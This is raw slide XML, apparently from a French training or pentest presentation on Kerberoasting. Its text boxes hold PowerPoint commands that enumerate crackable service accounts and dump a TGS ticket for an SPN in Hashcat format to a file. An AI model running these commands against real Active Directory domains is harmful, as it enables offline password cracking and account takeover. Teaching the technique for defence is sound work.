            <a:off x="8681083" y="12037489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avec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69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-5669082" y="4187168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0" y="-3975416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942975" y="1804008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800475" y="-3495894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732865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3052862" y="22269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3089056" y="4911284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349365" y="7328658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314" y="5129017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4" y="-3021301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502" y="583739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43400" y="7414496"/>
            <a:ext cx="1327005" cy="130012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D71569-8C8D-8177-6A9E-1A06C6DF3C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5741472" y="-141569"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="389566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ED144A4-CC9C-037D-AF7E-E6A1230CA025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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4657E09-A143-4397-1619-02DE37B4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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grp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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970594" y="458946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Kerberoasting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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970593" y="2033432"/>
            <a:ext cx="4297481" cy="1685047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 SMB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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681084" y="10484988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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681083" y="12037489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avec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48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-5669082" y="4187168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0" y="-3975416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942975" y="1804008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800475" y="-3495894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732865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3052862" y="22269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3089056" y="4911284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349365" y="7328658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314" y="5129017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4" y="-3021301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502" y="583739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43400" y="7414496"/>
            <a:ext cx="1327005" cy="130012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D71569-8C8D-8177-6A9E-1A06C6DF3C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5741472" y="-141569"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="389566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ED144A4-CC9C-037D-AF7E-E6A1230CA025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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4657E09-A143-4397-1619-02DE37B4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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grp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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970593" y="283734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Kerberoasting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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970593" y="1804008"/>
            <a:ext cx="4297481" cy="161851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 SMB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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970593" y="3566222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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681083" y="12037489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7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-5669082" y="4187168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0" y="-3975416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942975" y="1804008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800475" y="-3495894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732865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3052862" y="22269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3089056" y="4911284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349365" y="7328658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314" y="5129017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4" y="-3021301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502" y="583739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43400" y="7414496"/>
            <a:ext cx="1327005" cy="130012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D71569-8C8D-8177-6A9E-1A06C6DF3C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5741472" y="-141569"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="389566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ED144A4-CC9C-037D-AF7E-E6A1230CA025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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4657E09-A143-4397-1619-02DE37B4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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grp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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970593" y="247636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Kerberoasting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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6951545" y="1804008"/>
            <a:ext cx="4297480" cy="1487770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 SMB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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970593" y="3420190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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6951543" y="4893664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701EDFC-5E3D-CAB9-8DF6-C5252E705C66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6374031" y="1771880"/>
            <a:ext cx="5924550" cy="145351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Import-module .\Find-PotentiallyCrackableAccounts.ps1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Import-Module .\Get-TGSCipher.ps1`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5" name="Image 24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3ECB0640-8FE6-D31B-A3DA-27988A546B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091" y="1857902"/>
            <a:ext cx="935552" cy="296413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ED19C79-0B26-1DED-24B5-F17C294487CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6374031" y="3489828"/>
            <a:ext cx="5741859" cy="976866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Find-PotentiallyCrackableAccounts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FullData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Verbose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7" name="Image 26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DD549A9A-6E0B-496E-09C4-E0795DEC44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3364" y="3500905"/>
            <a:ext cx="909483" cy="2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67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691890" y="2093584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158116" y="320813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158116" y="3206474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691890" y="320813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4948315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8681085" y="320813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8681085" y="4948315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204586" y="4948316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72" y="5139809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69" y="795406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3919" y="696206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43400" y="5034153"/>
            <a:ext cx="1327005" cy="13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6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-5669082" y="4187168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0" y="-3975416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5884648" y="-3975416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800475" y="-3495894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732865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3052862" y="22269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3089056" y="4911284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349365" y="7328658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314" y="5129017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4" y="-3021301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502" y="583739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43400" y="7414496"/>
            <a:ext cx="1327005" cy="1300125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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="222697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Kerberoasting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AFCFB2D-429B-AA76-7EAF-67AC8C32C18E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="1843269"/>
            <a:ext cx="5924550" cy="145351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Import-module .\Find-PotentiallyCrackableAccounts.ps1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Import-Module .\Get-TGSCipher.ps1`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5" name="Image 24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B74EF978-7467-03A9-40F6-DE4D08E35E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36" y="1929291"/>
            <a:ext cx="935552" cy="296413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F6D82BE-5276-3851-95B5-429E01F8B66D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="3561217"/>
            <a:ext cx="5741859" cy="976866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Find-PotentiallyCrackableAccounts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FullData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Verbose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7" name="Image 26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04C282C2-382D-5932-9BC4-6840BF4D45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63" y="3572294"/>
            <a:ext cx="909483" cy="288153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 1307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A8227302-C828-A1AA-08BF-8CDDB1CF24A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391786" y="1302843"/>
            <a:ext cx="5643850" cy="4151304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="215900" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="36000"/>
              </a:prstClr>
            </a:outerShdw>
            <a:softEdge rad="38100"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 1336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DDFBD09E-704B-9181-8179-F4DCCE1DBB0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493577" y="-4457291"/>
            <a:ext cx="5440267" cy="4149374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040F23E-64D6-763F-7934-82002B369610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17139544" y="1008003"/>
            <a:ext cx="4297480" cy="1487770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 SMB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AB19360B-C5BD-F4BF-D46A-942BEED690AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17158592" y="2624185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3C92BC7C-7EBD-E223-2F01-1CD7E9F0FB2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17139542" y="4097659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40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-5669082" y="4187168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0" y="-3975416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5884648" y="-3975416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800475" y="-3495894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732865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3052862" y="22269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3089056" y="4911284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349365" y="7328658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314" y="5129017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4" y="-3021301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502" y="583739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43400" y="7414496"/>
            <a:ext cx="1327005" cy="130012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D71569-8C8D-8177-6A9E-1A06C6DF3C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5741472" y="-141569"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="389566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ED144A4-CC9C-037D-AF7E-E6A1230CA025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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4657E09-A143-4397-1619-02DE37B4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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grp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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="222697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Kerberoasting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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="14560594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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="16326676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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="12449850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pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 1307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A8227302-C828-A1AA-08BF-8CDDB1CF24A2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391786" y="1302843"/>
            <a:ext cx="5643850" cy="4151304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="215900" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="36000"/>
              </a:prstClr>
            </a:outerShdw>
            <a:softEdge rad="38100"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 1336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696782D3-20C7-5C78-EBE0-301ACB80C087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6434858" y="1304773"/>
            <a:ext cx="5440267" cy="4149374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D1DF26DD-4BBA-8872-E7B1-7C33E73CE943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-6263603" y="1795373"/>
            <a:ext cx="5924550" cy="1717948"/>
            <a:chOff x="324996" y="1843269"/>
            <a:chExt cx="5924550" cy="1717948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B717F91-EFB3-25E0-AF12-B8CCF77912E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324996" y="1843269"/>
              <a:ext cx="5924550" cy="1717948"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="242424"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="189260" dist="38100" dir="5400000" sx="102982" sy="102982" algn="t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40640">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="1000"/>
                </a:spcAft>
              </a:pPr>
              <a:endPara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 marR="40640">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="1000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="14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$ Get-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="140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TGSCipher</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="14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 -SPN "Service2/SRV-APPLICATIF.sad.corp:1434" -Format </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="140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Hashcat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="14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 | Out-File -Encoding utf8 C:\KALI_WINATK\TGS-HASH.txt</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="14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 marR="40640">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef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 </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="11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pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Image 31" descr="Une image contenant Graphique, Caractère coloré, cercle, symbole&#10;&#10;Description générée automatiquement">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C5CBF8-0045-A865-229E-F5C125824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936" y="1929291"/>
              <a:ext cx="935552" cy="296413"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 133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086CF3EA-F345-2FF8-9845-EC7795C3D2A2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794058" y="9433513"/>
            <a:ext cx="10798541" cy="1717948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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7D25AD7-6BDE-764A-3392-0C07D5338CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="1843269"/>
            <a:ext cx="5924550" cy="145351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Import-module .\Find-PotentiallyCrackableAccounts.ps1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Import-Module .\Get-TGSCipher.ps1`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6" name="Image 35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C5BAE7ED-553C-C1C0-0C37-CC68D7E63DA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36" y="1929291"/>
            <a:ext cx="935552" cy="296413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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21B3EB96-E448-15B7-E63E-86ED0C86D3D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="3561217"/>
            <a:ext cx="5741859" cy="976866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Find-PotentiallyCrackableAccounts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FullData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Verbose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8" name="Image 37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A20A64C8-60F1-C403-D36D-10348639CB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63" y="3572294"/>
            <a:ext cx="909483" cy="2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06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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324996" y="222697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Kerberoasting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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="14560594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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="16326676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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873280" y="12449850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F923CCD-AA82-B41A-321C-84357BD6EADF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="324996" y="1920999"/>
            <a:ext cx="5924550" cy="1717948"/>
            <a:chOff x="324996" y="1843269"/>
            <a:chExt cx="5924550" cy="1717948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AFCFB2D-429B-AA76-7EAF-67AC8C32C18E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324996" y="1843269"/>
              <a:ext cx="5924550" cy="1717948"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="242424"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="189260" dist="38100" dir="5400000" sx="102982" sy="102982" algn="t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40640">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="1000"/>
                </a:spcAft>
              </a:pPr>
              <a:endPara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 marR="40640">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="1000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="14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$ Get-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="140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TGSCipher</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="14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 -SPN "Service2/SRV-APPLICATIF.sad.corp:1434" -Format </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="140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Hashcat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="14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 | Out-File -Encoding utf8 C:\KALI_WINATK\TGS-HASH.txt</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="14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 marR="40640">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef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 </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="11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pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Image 24" descr="Une image contenant Graphique, Caractère coloré, cercle, symbole&#10;&#10;Description générée automatiquement">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B74EF978-7467-03A9-40F6-DE4D08E3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936" y="1929291"/>
              <a:ext cx="935552" cy="296413"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 1307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A8227302-C828-A1AA-08BF-8CDDB1CF24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8150" y="-4463905"/>
            <a:ext cx="5643850" cy="4151304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="215900" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="36000"/>
              </a:prstClr>
            </a:outerShdw>
            <a:softEdge rad="38100"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 1336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E2523C1F-95C2-26B1-7AA2-C3CADB729E3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726486" y="-4618963"/>
            <a:ext cx="5440267" cy="4149374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 133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75375A71-9727-4D1E-2AAE-5A143B08F49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4217" y="4078027"/>
            <a:ext cx="10798541" cy="1717948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917104-981C-50BE-C432-7814A1869DC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-6145359" y="1920999"/>
            <a:ext cx="5924550" cy="2694814"/>
            <a:chOff x="324996" y="1843269"/>
            <a:chExt cx="5924550" cy="2694814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FA4BEE98-6CFA-92B9-93DC-1B5BF2AECA5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324996" y="1843269"/>
              <a:ext cx="5924550" cy="1453515"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="242424"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="189260" dist="38100" dir="5400000" sx="102982" sy="102982" algn="t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Bef>
                  <a:spcPts val="500"/>
                </a:spcBef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 </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="11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Bef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="1000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="14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$ Import-module .\Find-PotentiallyCrackableAccounts.ps1</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="14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Bef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="1000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="14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$ Import-Module .\Get-TGSCipher.ps1`</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="14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 marR="40640">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="10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 </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="11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pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Image 34" descr="Une image contenant Graphique, Caractère coloré, cercle, symbole&#10;&#10;Description générée automatiquement">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F9CC6F4-9ECC-4DC3-1EF0-9A171E7AA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936" y="1929291"/>
              <a:ext cx="935552" cy="296413"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5F00EB47-B537-4158-B33C-C67807541D98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="324996" y="3561217"/>
              <a:ext cx="5741859" cy="976866"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="242424"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="189260" dist="38100" dir="5400000" sx="102982" sy="102982" algn="t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Bef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="1000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="14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$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="140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Find-PotentiallyCrackableAccounts</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="14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 -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="140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FullData</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="140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 -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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Verbose</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="14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pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="Image 36" descr="Une image contenant Graphique, Caractère coloré, cercle, symbole&#10;&#10;Description générée automatiquement">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A386FBDF-9F10-6652-023A-C615C969F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663" y="3572294"/>
              <a:ext cx="909483" cy="288153"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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58272D7-1432-5B7C-950B-92E238723CA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
